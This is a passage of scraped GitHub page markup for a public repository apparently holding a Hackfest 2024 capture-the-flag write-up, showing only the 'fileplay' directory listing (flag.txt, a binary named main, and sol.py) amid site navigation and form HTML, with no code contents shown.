5.72 0 0 1-.765-2.5Z"></path></svg></template> <div class="position-relative"> </div> <div class="FormControl-inlineValidation" id="validation-c1593c24-3c0a-44be-8e39-d17b6abbacc5" hidden="hidden"> <span> <svg aria-hidden="true" height="12" viewBox="0 0 12 12" version="1.1" width="12" data-view-component="true" class="octicon octicon-alert-fill"> <path d="M4.855.708c.5-.896 1.79-.896 2.29 0l4.675 8.351a1.312 1.312 0 0 1-1.146 1.954H1.33A1.313 1.313 0 0 1 .183 9.058ZM7 7V3H5v4Zm-1 3a1 1 0 1 0 0-2 1 1 0 0 0 0 2Z"></path></svg> </span> <span></span></div> </div> <div data-target="query-builder.screenReaderFeedback" aria-live="polite" aria-atomic="true" class="sr-only"></div></query-builder></form> <div class="d-flex flex-row color-fg-muted px-3 text-small color-bg-default search-feedback-prompt"> Search syntax tips <div class="d-flex flex-1"></div> </div> </div></div> </div></modal-dialog></div> </div> <div data-action="click:qbsearch-input#retract" class="dark-backdrop position-fixed" hidden data-target="qbsearch-input.darkBackdrop"></div> <div class="color-fg-default"> <dialog-helper> <dialog data-target="qbsearch-input.feedbackDialog" data-action="close:qbsearch-input#handleDialogClose cancel:qbsearch-input#handleDialogClose" id="feedback-dialog" aria-modal="true" aria-labelledby="feedback-dialog-title" aria-describedby="feedback-dialog-description" data-view-component="true" class="Overlay Overlay-whenNarrow Overlay--size-medium Overlay--motion-scaleFade"> <div data-view-component="true" class="Overlay-header"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 class="Overlay-title " id="feedback-dialog-title"> Provide feedback </h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="feedback-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div></div> <scrollable-region data-labelled-by="feedback-dialog-title"> <div data-view-component="true" class="Overlay-body"> </option></form><form id="code-search-feedback-form" data-turbo="false" action="/search/feedback" accept-charset="UTF-8" method="post"><input type="hidden" data-csrf="true" name="authenticity_token" value="rJdFkGZFIF0UGA+KAOL9hnix6uEp9HE3qp1+N0KnpVWTLJwAVVvVU/3j6O2fxkEZuutMwebXmHFRtU1HUtDfTA==" /> We read every piece of feedback, and take your input very seriously. <textarea name="feedback" class="form-control width-full mb-2" style="height: 120px" id="feedback"></textarea> <input name="include_email" id="include_email" aria-label="Include my email address so I can be contacted" class="form-control mr-2" type="checkbox"> <label for="include_email" style="font-weight: normal">Include my email address so I can be contacted</label></form></div> </scrollable-region> <div data-view-component="true" class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="feedback-dialog" type="button" data-view-component="true" class="btn"> Cancel</button> <button form="code-search-feedback-form" data-action="click:qbsearch-input#submitFeedback" type="submit" data-view-component="true" class="btn-primary btn"> Submit feedback</button></div></dialog></dialog-helper> We read every piece of feedback, and take your input very seriously. <custom-scopes data-target="qbsearch-input.customScopesManager"> <dialog-helper> <dialog data-target="custom-scopes.customScopesModalDialog" data-action="close:qbsearch-input#handleDialogClose cancel:qbsearch-input#handleDialogClose" id="custom-scopes-dialog" aria-modal="true" aria-labelledby="custom-scopes-dialog-title" aria-describedby="custom-scopes-dialog-description" data-view-component="true" class="Overlay Overlay-whenNarrow Overlay--size-medium Overlay--motion-scaleFade"> <div data-view-component="true" class="Overlay-header Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 class="Overlay-title " id="custom-scopes-dialog-title"> Saved searches </h1> <h2 id="custom-scopes-dialog-description" class="Overlay-description">Use saved searches to filter your results more quickly</h2> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="custom-scopes-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div></div> <scrollable-region data-labelled-by="custom-scopes-dialog-title"> <div data-view-component="true" class="Overlay-body"> <div data-target="custom-scopes.customScopesModalDialogFlash"></div> <div hidden class="create-custom-scope-form" data-target="custom-scopes.createCustomScopeForm"> </option></form><form id="custom-scopes-dialog-form" data-turbo="false" action="/search/custom_scopes" accept-charset="UTF-8" method="post"><input type="hidden" data-csrf="true" name="authenticity_token" value="FoVF8Z+BtUaengtlyuGaScqkJ+adpR+gGVUPLXDY+F2hXKez7bJJ3GdVvnKsEkfNfX6nPjxy5TyYXwkK6wQLTQ==" /> <div data-target="custom-scopes.customScopesModalDialogFlash"></div> <input type="hidden" id="custom_scope_id" name="custom_scope_id" data-target="custom-scopes.customScopesIdField"> <div class="form-group"> <label for="custom_scope_name">Name</label> <auto-check src="/search/custom_scopes/check_name" required> <input type="text" name="custom_scope_name" id="custom_scope_name" data-target="custom-scopes.customScopesNameField" class="form-control" autocomplete="off" placeholder="github-ruby" required maxlength="50"> <input type="hidden" data-csrf="true" value="uO5qVYHwJnIcURZ2CiVEwdC8+iBYnEcpXp+LBun3XboVzRNGSNVp6rek0xAgWqLBACihK76RWCXRe+Js6wKXHA==" /> </auto-check> </div> <div class="form-group"> <label for="custom_scope_query">Query</label> <input type="text" name="custom_scope_query" id="custom_scope_query" data-target="custom-scopes.customScopesQueryField" class="form-control" autocomplete="off" placeholder="(repo:mona/a OR repo:mona/b) AND lang:python" required maxlength="500"> </div> To see all available qualifiers, see our documentation. </form> </div> To see all available qualifiers, see our documentation. <div data-target="custom-scopes.manageCustomScopesForm"> <div data-target="custom-scopes.list"></div> </div> </div> </scrollable-region> <div data-view-component="true" class="Overlay-footer Overlay-footer--alignEnd Overlay-footer--divided"> <button data-action="click:custom-scopes#customScopesCancel" type="button" data-view-component="true" class="btn"> Cancel</button> <button form="custom-scopes-dialog-form" data-action="click:custom-scopes#customScopesSubmit" data-target="custom-scopes.customScopesSubmitButton" type="submit" data-view-component="true" class="btn-primary btn"> Create saved search</button></div></dialog></dialog-helper> </custom-scopes> </div></qbsearch-input><input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="ElTuvHu3IRn8dpuJBvqg5jxSuqeLQjR6XpByBdiwMYdHVf8qb+BZnNr3xsd6WnQfNgtnlYcE66aW4+mnLroWPg==" /> <div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div> Sign up </div> </div> </div> </div></header> <div hidden="hidden" data-view-component="true" class="js-stale-session-flash stale-session-flash flash flash-warn flash-full mb-3"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> <span>You switched accounts on another tab or window. Reload to refresh your session.</span> <button id="icon-button-5d8db8fa-38c3-4ab0-a448-39f5e2362616" aria-labelledby="tooltip-4f014fb9-bf2a-41b2-b372-6dc5c9a76fb3" type="button" data-view-component="true" class="Button Button--iconOnly Button--invisible Button--medium flash-close js-flash-close"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x Button-visual"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button><tool-tip id="tooltip-4f014fb9-bf2a-41b2-b372-6dc5c9a76fb3" for="icon-button-5d8db8fa-38c3-4ab0-a448-39f5e2362616" popover="manual" data-direction="s" data-type="label" data-view-component="true" class="sr-only position-absolute">Dismiss alert</tool-tip> </div> </div> <div id="start-of-content" class="show-on-focus"></div> <div id="js-flash-container" data-turbo-replace> <template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div> </div> </div></div> </template></div> <include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment> <div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" > <div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--page-header-bgColor, var(--color-page-header-bg));" data-turbo-replace> <div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;"> <div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> raouf-005 </span> <span>/</span> Hackfest-2k24-writeup <span></span><span>Public</span> </div> </div> <div id="repository-details-container" data-turbo-replace> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>0</span> <div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>0</span> <button aria-label="You must be signed in to add this repository to a list" type="button" disabled="disabled" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div> </div> </div> <div id="responsive-meta-container" data-turbo-replace></div> <nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/raouf-005/Hackfest-2k24-writeup/security/overall-count" accept="text/fragment+html"></include-fragment> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span> <div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <action-menu data-select-variant="none" data-view-component="true"> <focus-group direction="vertical" mnemonics retain> <button id="action-menu-539a56af-c923-41c2-ac55-fa156127197d-button" popovertarget="action-menu-539a56af-c923-41c2-ac55-fa156127197d-overlay" aria-controls="action-menu-539a56af-c923-41c2-ac55-fa156127197d-list" aria-haspopup="true" aria-labelledby="tooltip-9a8478a2-3bd7-4d22-b36c-b78ff33f7d08" type="button" data-view-component="true" class="Button Button--iconOnly Button--secondary Button--medium UnderlineNav-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal Button-visual"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg></button><tool-tip id="tooltip-9a8478a2-3bd7-4d22-b36c-b78ff33f7d08" for="action-menu-539a56af-c923-41c2-ac55-fa156127197d-button" popover="manual" data-direction="s" data-type="label" data-view-component="true" class="sr-only position-absolute">Additional navigation options</tool-tip> <anchored-position id="action-menu-539a56af-c923-41c2-ac55-fa156127197d-overlay" anchor="action-menu-539a56af-c923-41c2-ac55-fa156127197d-button" align="start" side="outside-bottom" anchor-offset="normal" popover="auto" data-view-component="true"> <div data-view-component="true" class="Overlay Overlay--size-auto"> <div data-view-component="true" class="Overlay-body Overlay-body--paddingNone"> <action-list> <div data-view-component="true"> <span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> </span> <span> Code</span> <span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> </span> <span> Issues</span> <span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> </span> <span> Pull requests</span> <span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> </span> <span> Actions</span> <span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> </span> <span> Projects</span> <span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> </span> <span> Security</span> <span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> </span> <span> Insights</span> </div></action-list> </div> </div></anchored-position> </focus-group></action-menu></div></nav> </div> <turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " > <react-app app-name="react-code-view" initial-path="/raouf-005/Hackfest-2k24-writeup/tree/main/fileplay" style="min-height: calc(100vh - 64px)" data-ssr="false" data-lazy="false" data-alternate="false"> <script type="application/json" data-target="react-app.embeddedData">{"payload":{"allShortcutsEnabled":false,"path":"fileplay","repo":{"id":777706471,"defaultBranch":"main","name":"Hackfest-2k24-writeup","ownerLogin":"raouf-005","currentUserCanPush":false,"isFork":false,"isEmpty":false,"createdAt":"2024-03-26T11:13:19.000Z","ownerAvatar":"https://avatars.githubusercontent.com/u/125606070?v=4","public":true,"private":false,"isOrgOwned":false},"currentUser":null,"refInfo":{"name":"main","listCacheKey":"v0:1711451667.0","canEdit":false,"refType":"branch","currentOid":"3753b23e971283cdfe6061fca0b1f23d28ccc381"},"tree":{"items":[{"name":"flag.txt","path":"fileplay/flag.txt","contentType":"file"},{"name":"main","path":"fileplay/main","contentType":"file"},{"name":"sol.py","path":"fileplay/sol.py","contentType":"file"}],"templateDirectorySuggestionUrl":null,"readme":null,"totalCount":3,"showBranchInfobar":false},"fileTree":{"":{"items":[{"name":"fileplay","path":"fileplay","contentType":"directory"},{"name":"static","path":"static","contentType":"directory"},{"name":"README.md","path":"README.md","contentType":"file"}],"totalCount":3}},"fileTreeProcessingTime":1.6089170000000002,"foldersToFetch":[],"treeExpanded":true,"symbolsExpanded":false,"csrf_tokens":{"/raouf-005/Hackfest-2k24-writeup/branches":{"post":"PE3Clrib9PvlAzx7pEViNr426uCXyx_rFvR4iuPckn_sDRBvO6knZKXgc3ewiyQU4kVF1fTyuZYs-TL30Vqd-A"},"/raouf-005/Hackfest-2k24-writeup/branches/fetch_and_merge/main":{"post":"36vtS2fuYXi11crG-xH9MYnyhqP5LTxwxQ0-Mc4ttO4OKNkmAkNHwTYk5t6Oc9d8xSbUunMMwVKJJgcn1qR4Nw"},"/raouf-005/Hackfest-2k24-writeup/branches/fetch_and_merge/main?discard_changes=true":{"post":"OlnLPPjrKkmqlcszJUbQ_LaS78L1SU_fq5snBhOhwsHr2v9RnUYM8Clk5ytQJPqx-ka9239osv3nsB4QCygOGA"}}},"title":"Hackfest-2k24-writeup/fileplay at main · raouf-005/Hackfest-2k24-writeup","appPayload":{"helpUrl":"https://docs.github.com","findFileWorkerPath":"/assets-cdn/worker/find-file-worker-a007d7f370d6.js","findInFileWorkerPath":"/assets-cdn/worker/find-in-file-worker-d0f0ff069004.js","githubDevUrl":null,"enabled_features":{"code_nav_ui_events":false,"copilot_conversational_ux":false,"react_blob_overlay":false,"copilot_conversational_ux_embedding_update":false,"copilot_popover_file_editor_header":false,"copilot_smell_icebreaker_ux":true,"copilot_workspace":false,"codeview_firefox_inert":true,"overview_async_data_channel":false}}}</script> <div data-target="react-app.reactRoot"></div></react-app></turbo-frame> </div> </turbo-frame> </main> </div> </div> <footer class="footer pt-8 pb-6 f6 color-fg-muted p-responsive" role="contentinfo" > <h2 